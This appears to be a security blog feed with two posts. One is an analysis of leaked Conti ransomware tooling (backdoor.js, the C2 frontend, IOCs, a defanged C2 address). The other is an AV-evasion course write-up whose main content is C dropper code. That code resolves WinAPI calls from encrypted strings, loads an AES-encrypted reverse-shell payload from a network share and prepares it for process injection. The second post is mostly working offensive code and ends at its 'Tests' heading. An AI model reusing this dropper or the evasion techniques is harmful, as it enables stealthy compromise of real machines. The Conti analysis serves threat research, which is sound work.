Jekyll2022-04-21T15:36:19+00:00https://blackcloud.me/feed.xmlBlackCloud{"name"=>nil, "avatar"=>"/assets/images/blackcloud3.png", "bio"=>"Made to broke things", "location"=>"noplace", "email"=>nil, "links"=>[{"label"=>"Email", "icon"=>"fas fa-fw fa-envelope-square", "url"=>"mailto:bolo@autistici.org"}, {"label"=>"Website", "icon"=>"fas fa-fw fa-link"}, {"label"=>"Twitter", "icon"=>"fab fa-fw fa-twitter-square", "url"=>"https://twitter.com/bolonobolo"}, {"label"=>"Facebook", "icon"=>"fab fa-fw fa-facebook-square"}, {"label"=>"GitHub", "icon"=>"fab fa-fw fa-github", "url"=>"https://github.com/bolonobolo"}, {"label"=>"Instagram", "icon"=>"fab fa-fw fa-instagram"}, {"label"=>"Hackthebox", "url"=>"https://www.hackthebox.eu/profile/8822", "icon"=>"fas fa-fw fa-link"}]}Conti Leaks - backdoor and frontend2022-03-08T00:00:00+00:002022-03-08T00:00:00+00:00https://blackcloud.me/Conti-leaks-backdoor<p><img src="/assets/images/Conti/leaks.jpeg" alt="" /><br /></p>
<h2 id="introduction">Introduction</h2>
<p>The 27 of February 2022 after the official declaration of Conti ransomware group to supports Russia in the conflict against Ukraine and to threatens every entity that would hit Russia IT infrastructures, <del>a selfdeclarated Ukrainian operator of Conti</del> a bored security researcher, started to leaks chat logs and internal tools. They started publish files on Anonfiles and in the meantime they opened a <a href="https://twitter.com/ContiLeaks">Twitter account</a>.</p>
<p>Me and my collegue <a href="https://twitter.com/_mostwanted002_">Mayank</a> started poke around the data leaked and published on <a href="https://share.vx-underground.org/Conti/">VX-Udenrground</a> website and we found a lot of chat logs and some internal tools. There are a lot of good analysis on the chat logs, so we decided to move on the internal tools.</p>
<p>The first thing we saw was the Conti locker, containing both decryptor and encryptor in a password protected zip file. The password was added to avoid bad uses of the encryptor executable.
Next thing we saw was a file called <code class="language-plaintext highlighter-rouge">backdoor.js.zip</code> that makes us more courious. We decided to apply the “dividi et impera” strategy, Mayank decided to analyzes the Conti Locker and I took the backdoor. <a href="https://mostwanted002.cf/post/conti-locker/">Here</a> you can find the work of Mayank about his analysis.</p>
<h2 id="conti-operator-infrastructure">Conti Operator infrastructure</h2>
<h3 id="the-git-repository">The Git repository</h3>
<p>Thanks to the initial work of <a href="https://twitter.com/res260">Emilio Gonzales</a> with his <a href="https://twitter.com/res260/status/1498476237613850628">tweet</a> we know that the zip file contains a git repository, so first thing to do is to rename the folder to <code class="language-plaintext highlighter-rouge">.git</code>, than run <code class="language-plaintext highlighter-rouge">git init</code> and <code class="language-plaintext highlighter-rouge">git reset</code> to retrieve the contents.</p>
<p><img src="/assets/images/Conti/1st.png" alt="" /></p>
<p>Then move on the content of the FETCH_HEAD file, where we find that there are three branches: <code class="language-plaintext highlighter-rouge">master</code>, <code class="language-plaintext highlighter-rouge">new_http_connections</code> and <code class="language-plaintext highlighter-rouge">HTTP</code>.</p>
<p><img src="/assets/images/Conti/2nd.png" alt="" /></p>
<p>Looking at the git config file we find the link and probably the owner of the repository</p>
<p><img src="/assets/images/Conti/3rd.png" alt="" /></p>
<p>The main repo site could be retrieved in the git folder’s config file and point to <code class="language-plaintext highlighter-rouge">hxxps://gitlab-ci-token:UaA2b97vzyyEhqtgjJCT@179.]43.]147.]243/steller/backdoor.]js.]git</code> that redirect to <code class="language-plaintext highlighter-rouge">hxxps://179.]43.]147.]243/steller/backdoor.]js.]git</code>
But once connected we receive an SSL certificate error</p>
<p><img src="/assets/images/Conti/4th.png" alt="" /></p>
<h3 id="backdoorjs">Backdoor.js</h3>
<p>The backdoor.js script include some others js script that implement some functionality like logging and Windows commands execution</p>
<p><img src="/assets/images/Conti/5th.png" alt="" /></p>
<p>Looking at the code it seems the backdoor is a possible entry point for Conti operators, it could be used for:</p>
<ul>
<li>Info gathering included Locale and LANG recognition</li>
<li>Uploading files</li>
<li>Downloading file for data exfiltration</li>
<li>Command execution through javascript native dll</li>
</ul>
<p>The operations are controlled using bot machines, the commands are obfuscated with MD5/XOR where the victim ID is the key, then the commands are sent to the backdoor using HTTP GET and POST requests. The results of the commands and the files exfiltrated are sent to the bot machines that are controlled by the “admin” of the operation.
In the JS comments there are some instructions for these “admin” included caching the files that come from the bot. Is not clear the why of these instructions.
The backdoor is compiled using python2 and preprocess:
<code class="language-plaintext highlighter-rouge">python2 preprocess\build\scripts-2.7\preprocess -o backdoor.build.js -D DEBUG=1 backdoor.js</code>
The victim ID is built using some information collected on the victim machine</p>
<p><img src="/assets/images/Conti/6th.png" alt="" /></p>
<p>Then the ID is used to identify the bot that’s serving the ransomware campaign against it.</p>
<p><img src="/assets/images/Conti/7th.png" alt="" /></p>
<p>Looking at the code it seems the ID is built using these data:</p>
<ul>
<li>SwindirDC - Data of creation of windir</li>
<li>SPC - Computer name</li>
<li>Swindirsys32DC - Data of creation of system32 directory</li>
<li>SWorkgroup - the WORKGROUP name</li>
</ul>
<p>Then the var Smain is valued using the collected data:
<code class="language-plaintext highlighter-rouge">Smain = (SwindirDC + '.' + SPC + '.' + Swindirsys32DC + '.' + SWorkgroup);</code>
Then the Smain is hashed by MD5 algorithm:
<code class="language-plaintext highlighter-rouge">var SMD5Hash = MD5Hash(Smain);</code></p>
<h3 id="language-check">Language check</h3>
<p>The LANG/LOCALE check is used probably to avoid attacks against russian and friends targets. The codes used as a hexadecimal value and translated in the comments are the ISO country codes. The nations are listed below:</p>
<table>
<thead>
<tr>
<th>ISO</th>
<th>Nation</th>
</tr>
</thead>
<tbody>
<tr>
<td>AZ</td>
<td>AZERBAIJAN</td>
</tr>
<tr>
<td>AM</td>
<td>ARMENIA</td>
</tr>
<tr>
<td>BY</td>
<td>BELARUS</td>
</tr>
<tr>
<td>KZ</td>
<td>KAZAKHSTAN</td>
</tr>
<tr>
<td>KG</td>
<td>KYRGYZSTAN</td>
</tr>
<tr>
<td>RO</td>
<td>ROMANIA</td>
</tr>
<tr>
<td>TJ</td>
<td>TAJIKISTAN</td>
</tr>
<tr>
<td>UZ</td>
<td>UZBEKISTAN</td>
</tr>
<tr>
<td>GE</td>
<td>GEORGIA</td>
</tr>
<tr>
<td>UA</td>
<td>UKRAINE</td>
</tr>
<tr>
<td>TM</td>
<td>TURKMENISTAN</td>
</tr>
</tbody>
</table>
<p>Of course they are defined using a javascript dictionary so they can be changed, if necessary.
The function CheckLocale() is not called anywhere in the script but is present so we can desume Conti developers are asked to implement some sort of check about targets position, to avoid hitting friendly nations depending on geopolitical situation during the time.</p>
<p><img src="/assets/images/Conti/8th.png" alt="" /></p>
<p><img src="/assets/images/Conti/9th.png" alt="" /></p>
<p><img src="/assets/images/Conti/10th.png" alt="" /></p>
<p><img src="/assets/images/Conti/11th.png" alt="" /></p>
<h3 id="connection-function">Connection function</h3>
<p>The remote client connection function allows the attacker to send GET and POST commands, previously obfuscated using MD5 and XOR encoding to bypass WAF, IDS and IPS appliances.</p>
<p><img src="/assets/images/Conti/12th.png" alt="" /></p>
<p>It seems also that the interactions from the attacker to the victim are controlled by a frontend or C&C (see the frontend chapter for details) where the operator can login and find the list of victims identified by bot ID.
Some IPs are hardcoded inside the script and used for tests, they are called “Testbot”.
It seems that the bots are instructed to enter a loop since connections, command executions or results are completed.
There are also some instructions implemented to obfuscate the IPs of the C&C in the logs, using the same MD5 function previously mentioned.</p>
<h3 id="utilsjs">Utils.js</h3>
<p>Define the commands that could be launched with native dll from javascript</p>
<p><img src="/assets/images/Conti/13th.png" alt="" /></p>
<h3 id="commandsjs">Commands.js</h3>
<p>Defines the type of commands that could be launched on the victim machine</p>
<p><img src="/assets/images/Conti/14th.png" alt="" /></p>
<h3 id="logjs">Log.js</h3>
<p>Allows to log everything in a file with path c:\temp\backdoor.js.log</p>
<p><img src="/assets/images/Conti/15th.png" alt="" /></p>
<h3 id="httpjs">Http.js</h3>
<p>This file set the HTTP metadata like User agent and connection parameters</p>
<p><img src="/assets/images/Conti/16th.png" alt="" /></p>
<h2 id="frontend">Frontend</h2>
<p>The fun fact is that we also retrieved the frontend files leaked by the former operator and opening the 7zip archives we can find 3 directory, the first one contains 33 web pages, every page contains 20 victims sorted by domain, the second one contains the same list of victims sorted by comments and the third contains some pdf with screenshots of the console operating against their victims.
The first 2 folders contain html files and subfolders where we can find everything we need to make the frontend almost usable, they are css and javascript files.</p>
<h3 id="main-page">Main page</h3>
<p>Opening the file 1.html we land on the Operator frontend</p>
<p><img src="/assets/images/Conti/17th.png" alt="" /></p>
<p>Where we can recognize immediately in the middle of the page the lists of the victims that probably are running the backdoor.js.</p>
<h3 id="operator-menu">Operator menu</h3>
<p>On the left panel, there is the operator menu</p>
<p><img src="/assets/images/Conti/18th.png" alt="" /></p>
<h3 id="victim-session">Victim session</h3>
<p>We are able to partially navigate only the Bot page, the other links are broken because they are pointing to a dead onion site <code class="language-plaintext highlighter-rouge">hxxps://x6rciduomtjt25xigz7onkgxmusuwwuxqvidjkcramwg3lb5vvpsm7ad[.]onion</code></p>
<p><img src="/assets/images/Conti/19th.png" alt="" /></p>
<p>But in the meantime we can retrieve juicy information on that page, first of all we can see the column headers that help us understand the meaning of the data.</p>
<p><img src="/assets/images/Conti/20th.png" alt="" /></p>
<p>The columns are (from left to right):</p>
<ul>
<li>ID</li>
<li>Bot</li>
<li>OS (32 or 64 bit)</li>
<li>Group (not clear what it means)</li>
<li>Country</li>
<li>IP</li>
<li>Domain</li>
<li>Hostname</li>
<li>First activity (of the backdoor connection)</li>
<li>Last activity (of the backdoor connection)</li>
<li>Status (of the backdoor connection)</li>
<li>Priority (from 1 to 5 stars)</li>
<li>Comments (probably inserted by the operators)</li>
<li>Actions</li>
</ul>
<p><img src="/assets/images/Conti/21th.png" alt="" /></p>
<p>The + symbols should reveals the details of the single victim, unfortunatley we are unable to click on it but looking at the screenshots folder we can find what the details are</p>
<p><img src="/assets/images/Conti/22th.png" alt="" />
<img src="/assets/images/Conti/23th.png" alt="" /></p>
<p>As we saw before, the Locale value is important for some sort of actions.</p>
<h3 id="command-builder">Command builder</h3>
<p>Just under the banner we have the command builder that allows the operator to make actions against the victim once selected form the list.
The operation available are:</p>
<p><img src="/assets/images/Conti/24th.png" alt="" />
<img src="/assets/images/Conti/25th.png" alt="" />
<img src="/assets/images/Conti/26th.png" alt="" /></p>
<p>The list is very similar to the TCmd() list of the backdoor.js file</p>
<p><img src="/assets/images/Conti/27th.png" alt="" /></p>
<p>Some commands are missing, so that suggests we are looking at an old version or a prototype of the backdoor.js file. Looking at the html code we found that the operations are commented so we can retrieve some informations:</p>
<p><img src="/assets/images/Conti/28th.png" alt="" /></p>
<p>In particular the Get_systeminfo operation is commented like this “is needed to obtain the information about the system where the bot resides”.
Also the script.js file contains the values of the choices taken by the operator and passed to the onion site using a GET call.</p>
<p><img src="/assets/images/Conti/29th.png" alt="" /></p>
<p>We can deduce then 2 things:</p>
<ul>
<li>“the bot” means the backdoor.js file implanted in the victim machine</li>
<li>The onion site is connected directly to the victim machine using the backdoor.js file</li>
</ul>
<p>The techniques used to run commands are not new but still interesting:</p>
<p><img src="/assets/images/Conti/30th.png" alt="" /></p>
<p>For the exe section the operator can use Process Hollowing, Process Doppelganging or the classic CreateProcess.
For the dll the operator can choose to run dll using native Windows OS commands or the injection method, in this last case only the Process Hollowing is available.</p>
<p><img src="/assets/images/Conti/31th.png" alt="" /></p>
<p>For the Powershell and Bat session the operator can chooses the run type</p>
<p><img src="/assets/images/Conti/32th.png" alt="" /></p>
<p>We have no informations on the Run Shellcode mode so it’s not clear how it works</p>
<p>It seems the console also allows downloading files but it isn’t clear if it’s used for the data leakage of the victim files.
The exe, dll, powershell and bat attack sessions accept custom parameters and allow the attacker to choose to use a file called fake.exe. We don’t know what the file is but the html page contains what they seem the metadata’s file.</p>
<p><img src="/assets/images/Conti/33th.png" alt="" /></p>
<ul>
<li>Name:fake.exe</li>
<li>Size:3584</li>
<li>Uploaded:2021-11-02 12:20:44</li>
<li>By user: botadmin</li>
<li>MD5 Hash:7c6187a71902254704866d5db8448ba0</li>
</ul>
<p>We have squized all the informations from the leaked data about the Conti Operator System, but of course we are humans so we can do mistake or missing something.
We invite you to ping us in case you find something new on that leaks.</p>
<h2 id="iocs">IOCs</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>backdoor.js
84BC041EAAF565C53619A37FB62590924A110D5365A6875BA0270D4BAA2F2130
http.js
168B489131DFDD67B5C8749B67C32746D6292B6929D1A33D4D2B4D6BDF2A96E6
utils.js
93B6A67AA20BE9068B264FF226982425F0ACBA722C68EE00D102FB9C80523EDB
commands.js
27C8675F597F4D86189A2FCE978C60834E1B9CCAC0E41D213FC5D108D41D5EAB
log.js
3254DF45C49831A7A565303865AB93EA47E5019D1A3FD0FC987A79C5CF23043A
</code></pre></div></div>
<h2 id="conclusion">Conclusion</h2>
<p>According with <a href="https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/">the DFIR Report</a> it seems to be a conection about Bazar Loader and Conti group and looking at the backdoor file it seems true. I tried to understand how the Conti group Operator System works:</p>
<p><img src="/assets/images/Conti/Conti_diagram.png" alt="" /></p>
<h2 id="update-16032022">UPDATE 16/03/2022</h2>
<p><a href="https://twitter.com/seadev3">Chelsea</a> published others interesting IOCs that can confirm the connection between Bazar Loader and Conti group, you can check and note the domains inn this <a href="https://twitter.com/seadev3/status/1504102491490852865">tweet</a>.</p>
<p><img src="/assets/images/Conti/FN67iN5XwAANSpS.png" alt="" /></p>{"name"=>nil, "avatar"=>"/assets/images/blackcloud3.png", "bio"=>"Made to broke things", "location"=>"noplace", "email"=>nil, "links"=>[{"label"=>"Email", "icon"=>"fas fa-fw fa-envelope-square", "url"=>"mailto:bolo@autistici.org"}, {"label"=>"Website", "icon"=>"fas fa-fw fa-link"}, {"label"=>"Twitter", "icon"=>"fab fa-fw fa-twitter-square", "url"=>"https://twitter.com/bolonobolo"}, {"label"=>"Facebook", "icon"=>"fab fa-fw fa-facebook-square"}, {"label"=>"GitHub", "icon"=>"fab fa-fw fa-github", "url"=>"https://github.com/bolonobolo"}, {"label"=>"Instagram", "icon"=>"fab fa-fw fa-instagram"}, {"label"=>"Hackthebox", "url"=>"https://www.hackthebox.eu/profile/8822", "icon"=>"fas fa-fw fa-link"}]}AV Evasion - Sharing is (s)caring2020-10-02T00:00:00+00:002020-10-02T00:00:00+00:00https://blackcloud.me/sharing-is-caring<p><img src="/assets/images/AV_evasion/DbP5UbHXUAAzcVm.jpg" alt="" /><br /></p>
<h2 id="introduction">Introduction</h2>
<p>Hello hackers and welcome back to the 3rd and last assignment of the well done course on Malware Development by <a href="https://institute.sektor7.net/red-team-operator-malware-development-essentials">Sektor7</a>, in the previous <a href="https://blackcloud.me/the-payload-is-behind-kitties/">blog post</a> we saw PE injection using a payload hidden inside an image, implemented the dropper with the capacity of extraction of the payload and injecting it in the PE process target. The last assignmet ask us to encrypt a payload, load it on the file system or in our case in shared folder on the target OS, and write a dropper that open the payload and trigger the injection. The suggestions from reenz0h here are to use the <a href="https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea">CreateFileA</a> and <a href="https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-readfile">ReadFile</a> WinAPI functions.</p>
<h2 id="the-assignment">The Assignment</h2>
<p>Let’s start taking our last dropper and check what we have and what we must change.<br />
The most of the code is working pretty well as we saw, but the payload extraction has to be changed because now reenz0h asked to open the payload from a directory on the fiule system, we choosed a network sherd folder, so take a look closer to the payload memory loading and analyze what we have to change.</p>
<h2 id="the-payload">The Payload</h2>
<p>In the previous posts we already prepared and encrypted the payload that was implemented as a resource or hidden behind an image, so there isn’t much work here. The AES256 encrypted payload is the same used in the last post so a simple Win64 reverse shell</p>
<p>Let’s check the payload with <code class="language-plaintext highlighter-rouge">xxd</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xxd <span class="nt">-g1</span> payload_enc
00000000: 4d 37 18 <span class="nb">fc </span>9d 9a ac 18 47 a6 <span class="nb">fc </span>63 96 <span class="nb">fc df </span>01 M7......G..c....
00000010: 1b 24 25 c0 7f 11 c6 5b 9a 8f b6 c3 1b e3 de 01 .<span class="nv">$%</span>....[........
00000020: 9a e3 de 83 1b e0 82 dc 60 9d 90 f8 b9 53 c9 78 ........<span class="sb">`</span>....S.x
00000030: 35 a3 92 1e 74 65 04 71 2f 9f e3 37 47 1a b9 3a 5...te.q/..7G..:
00000040: 55 60 f3 78 c0 64 1d ef 60 81 79 19 8e e2 44 3e U<span class="sb">`</span>.x.d..<span class="sb">`</span>.y...D>
00000050: 06 1c 01 0c 35 8a 28 f3 38 cf 13 0e 07 05 ff 37 ....5.<span class="o">(</span>.8......7
00000060: 39 98 52 b4 45 65 46 27 47 4d 1a 5d 7a 1e e3 4e 9.R.EeF<span class="s1">'GM.]z..N
00000070: 2c 0b be e1 01 78 99 48 30 c3 01 cc e4 12 49 96 ,....x.H0.....I.
00000080: c0 d8 0d 1d 5d 0b 14 6a 64 b7 04 ae 34 6c 27 4f ....]..jd...4l'</span>O
00000090: 9e ef c9 58 15 86 31 57 a9 1b 8f 7c 9b 69 73 7d ...X..1W...|.is<span class="o">}</span>
000000a0: ba 53 93 34 1d db c0 c4 d9 be 2a 47 0c 63 56 0d .S.4......<span class="k">*</span>G.cV.
000000b0: 43 9d 27 fd 12 1c 11 61 ae f5 b8 d7 eb f2 ad 67 C.<span class="s1">'....a.......g
000000c0: 25 1b f9 ef 24 4b 6c ed 04 63 ea 68 92 63 ee 75 %...$Kl..c.h.c.u
000000d0: 48 65 40 c3 50 f2 d2 88 8c 43 51 1c ea 82 67 9d He@.P....CQ...g.
000000e0: 32 4f 13 f9 ba df da 0e dc e6 0a 69 8d 87 98 9a 2O.........i....
000000f0: df a4 41 60 a0 1b f6 85 e2 57 3c 57 d2 b6 06 b5 ..A`.....W<W....
00000100: 41 40 24 c9 2d f1 68 c4 57 6e c4 4d 43 18 e5 4f A@$.-.h.Wn.MC..O
00000110: 09 0c 89 ff c2 d0 4a bc 55 b6 50 3a b4 53 dd 69 ......J.U.P:.S.i
00000120: 62 2d c2 89 d1 a9 11 c3 d2 57 63 ed 7f 31 e3 41 b-.......Wc..1.A
00000130: fb 91 08 1e 9e d7 94 17 58 4c 7b 0d 79 ee 9b fe ........XL{.y...
00000140: 5f 59 b7 f3 bb 61 fb 0e eb 45 da 6c b5 9e e5 f9 _Y...a...E.l....
00000150: 65 fb 18 7f a0 9a d3 7d 63 76 79 a2 01 ea 1a f8 e......}cvy.....
00000160: dd 54 cf 64 bc 8c b2 d2 26 04 b9 d4 6d 97 78 88 .T.d....&...m.x.
00000170: 79 d8 e7 50 2a 21 18 4f 1a e3 b4 9d ec c4 de 11 y..P*!.O........
00000180: 6d 8d fc 05 d2 a1 42 ff 6b ad 75 67 16 26 93 66 m.....B.k.ug.&.f
00000190: 55 76 86 eb 4c c7 45 c1 a1 3b f5 12 a6 5a 6a 01 Uv..L.E..;...Zj.
000001a0: fe 31 13 10 77 1b cd 47 dd d8 c2 8a cc 90 ca b5 .1..w..G........
000001b0: b2 64 40 d6 0a 73 66 76 95 08 1c cc b6 f7 6f 9c .d@..sfv......o.
000001c0: 04 46 10 53 9e 1f 09 bc 95 cf 25 70 e1 38 0b 9c .F.S......%p.8..
</span></code></pre></div></div>
<p>Now we must mount the folder where the payload is, in the target OS as a shared folder.</p>
<h2 id="the-dropper">The Dropper</h2>
<p>First thing first we define the size of our buffer</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="cp">#define BUFFSIZE 512
</span></code></pre></div></div>
<p>Next we have to define the elements needed to call the <code class="language-plaintext highlighter-rouge">CreateFileA</code> and <code class="language-plaintext highlighter-rouge">ReadFile</code> functions in the encrypted way.<br />
The first elements are the pointers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">HANDLE</span> <span class="p">(</span><span class="n">WINAPI</span> <span class="o">*</span> <span class="n">pCreateFileA</span><span class="p">)(</span>
<span class="n">LPCSTR</span> <span class="n">lpFileName</span><span class="p">,</span>
<span class="n">DWORD</span> <span class="n">dwDesiredAccess</span><span class="p">,</span>
<span class="n">DWORD</span> <span class="n">dwShareMode</span><span class="p">,</span>
<span class="n">LPSECURITY_ATTRIBUTES</span> <span class="n">lpSecurityAttributes</span><span class="p">,</span>
<span class="n">DWORD</span> <span class="n">dwCreationDisposition</span><span class="p">,</span>
<span class="n">DWORD</span> <span class="n">dwFlagsAndAttributes</span><span class="p">,</span>
<span class="n">HANDLE</span> <span class="n">hTemplateFile</span>
<span class="p">);</span>
<span class="n">BOOL</span> <span class="p">(</span><span class="n">WINAPI</span> <span class="o">*</span> <span class="n">pReadFile</span><span class="p">)(</span>
<span class="n">HANDLE</span> <span class="n">hFile</span><span class="p">,</span>
<span class="n">LPVOID</span> <span class="n">lpBuffer</span><span class="p">,</span>
<span class="n">DWORD</span> <span class="n">nNumberOfBytesToRead</span><span class="p">,</span>
<span class="n">LPDWORD</span> <span class="n">lpNumberOfBytesRead</span><span class="p">,</span>
<span class="n">LPOVERLAPPED</span> <span class="n">lpOverlapped</span>
<span class="p">);</span>
</code></pre></div></div>
<p>Then the encrypted strings,</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">sCreateFileA</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="p">...</span> <span class="p">};</span>
<span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">sReadFile</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="p">...</span> <span class="p">};</span>
</code></pre></div></div>
<p>the strings decryption</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">AESDecrypt</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span> <span class="n">sCreateFileA</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sCreateFileA</span><span class="p">),</span> <span class="n">key</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">key</span><span class="p">));</span>
<span class="n">AESDecrypt</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span> <span class="n">sReadFile</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sReadFile</span><span class="p">),</span> <span class="n">key</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">key</span><span class="p">));</span>
</code></pre></div></div>
<p>and the address assignment to the function pointers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">pCreateFileA</span> <span class="o">=</span> <span class="n">GetProcAddress</span><span class="p">(</span><span class="n">GetModuleHandle</span><span class="p">(</span><span class="n">sKernel</span><span class="p">),</span> <span class="n">sCreateFileA</span><span class="p">);</span>
<span class="n">pReadFile</span> <span class="o">=</span> <span class="n">GetProcAddress</span><span class="p">(</span><span class="n">GetModuleHandle</span><span class="p">(</span><span class="n">sKernel</span><span class="p">),</span> <span class="n">sReadFile</span><span class="p">);</span>
</code></pre></div></div>
<p>Next we have to define the file <code class="language-plaintext highlighter-rouge">HANDLE</code>, the shared path of the payload (we have to use the double backslash to avoid the escaping chars) and the payload pointer.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">HANDLE</span> <span class="n">hFile</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">path</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"</span><span class="se">\\\\</span><span class="s">tsclient</span><span class="se">\\</span><span class="s">share</span><span class="se">\\</span><span class="s">payload_enc"</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">payload</span><span class="p">[</span><span class="n">BUFFSIZE</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span>
</code></pre></div></div>
<p>Last but not least, as for the previous post, we must change the way the payload is loaded in memory.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="c1">// Load resources section</span>
<span class="n">res</span> <span class="o">=</span> <span class="n">pFindResourceA</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">MAKEINTRESOURCE</span><span class="p">(</span><span class="n">IMAGE</span><span class="p">),</span> <span class="n">RT_RCDATA</span><span class="p">);</span>
<span class="n">resHandle</span> <span class="o">=</span> <span class="n">pLoadResource</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">res</span><span class="p">);</span>
<span class="c1">// Extract payload from the image</span>
<span class="n">image</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">pLockResource</span><span class="p">(</span><span class="n">resHandle</span><span class="p">);</span> <span class="c1">// lock the resource and point to the first char of the jpg</span>
<span class="n">image_len</span> <span class="o">=</span> <span class="n">SizeofResource</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">res</span><span class="p">);</span> <span class="c1">// get the size of the jpg + p0 + last 7 bytes </span>
<span class="n">end</span> <span class="o">=</span> <span class="n">image</span> <span class="o">+</span> <span class="n">image_len</span> <span class="o">-</span> <span class="mi">7</span><span class="p">;</span> <span class="c1">// jump to the end of the jpg and read the last 7 bytes that are the original size of the jpg without p0</span>
<span class="n">size</span> <span class="o">=</span> <span class="n">atoi</span><span class="p">(</span><span class="n">end</span><span class="p">);</span> <span class="c1">// cast from char to int, now size is the original size of the jpg</span>
<span class="n">offset</span> <span class="o">=</span> <span class="n">image</span> <span class="o">+</span> <span class="n">size</span><span class="p">;</span> <span class="c1">// offset points to the first char of the p0</span>
<span class="n">p0_len</span> <span class="o">=</span> <span class="n">image_len</span> <span class="o">-</span> <span class="n">size</span> <span class="o">-</span> <span class="mi">7</span><span class="p">;</span> <span class="c1">// calculate the payload size</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">p0</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">p0_len</span><span class="p">);</span> <span class="c1">// copy in another memory area the effective p0</span>
<span class="c1">// Allocate some memory buffer for p0</span>
<span class="n">exec_mem</span> <span class="o">=</span> <span class="n">pVirtualAlloc</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">p0_len</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_READWRITE</span><span class="p">);</span>
<span class="c1">// Copy p0 to new memory buffer</span>
<span class="n">pRtlMoveMemory</span><span class="p">(</span><span class="n">exec_mem</span><span class="p">,</span> <span class="n">p0</span><span class="p">,</span> <span class="n">p0_len</span><span class="p">);</span>
</code></pre></div></div>
<p>In the code trunk below, referred to the dropper of the previous post, the payload is loaded from the resources and extracted from the image but now we have an encrypted file in a shared folder so we have to change the dropper like this</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="c1">// Load the payload from FS to memory</span>
<span class="n">hFile</span> <span class="o">=</span> <span class="n">pCreateFileA</span><span class="p">(</span><span class="n">path</span><span class="p">,</span>
<span class="n">GENERIC_READ</span><span class="p">,</span>
<span class="n">FILE_SHARE_READ</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span>
<span class="n">OPEN_EXISTING</span><span class="p">,</span>
<span class="n">FILE_ATTRIBUTE_NORMAL</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">hFile</span> <span class="o">==</span> <span class="n">INVALID_HANDLE_VALUE</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">FALSE</span> <span class="o">==</span> <span class="n">pReadFile</span><span class="p">(</span><span class="n">hFile</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="p">(</span><span class="n">BUFFSIZE</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">))</span> <span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Close the HANDLE</span>
<span class="n">pCloseHandle</span><span class="p">(</span><span class="n">hFile</span><span class="p">);</span>
<span class="n">payload_len</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">payload</span><span class="p">);</span>
<span class="c1">// Allocate some memory buffer for payload</span>
<span class="n">exec_mem</span> <span class="o">=</span> <span class="n">pVirtualAlloc</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_READWRITE</span><span class="p">);</span>
<span class="c1">// Copy payload to new memory buffer</span>
<span class="n">pRtlMoveMemory</span><span class="p">(</span><span class="n">exec_mem</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">);</span>
</code></pre></div></div>
<p>After opening the file with <code class="language-plaintext highlighter-rouge">CreateFileA</code> function we need to read it with <code class="language-plaintext highlighter-rouge">ReadFile</code>, this function load the payload as binary stream in the <code class="language-plaintext highlighter-rouge">payload</code> pointer in memory. What we must do now is to calculate the payload lenght and move the payload to another RW memory buffer. After that we are ready to decrypt our payload and inject it in our PE target process.</p>
<h2 id="tests">Tests</h2>
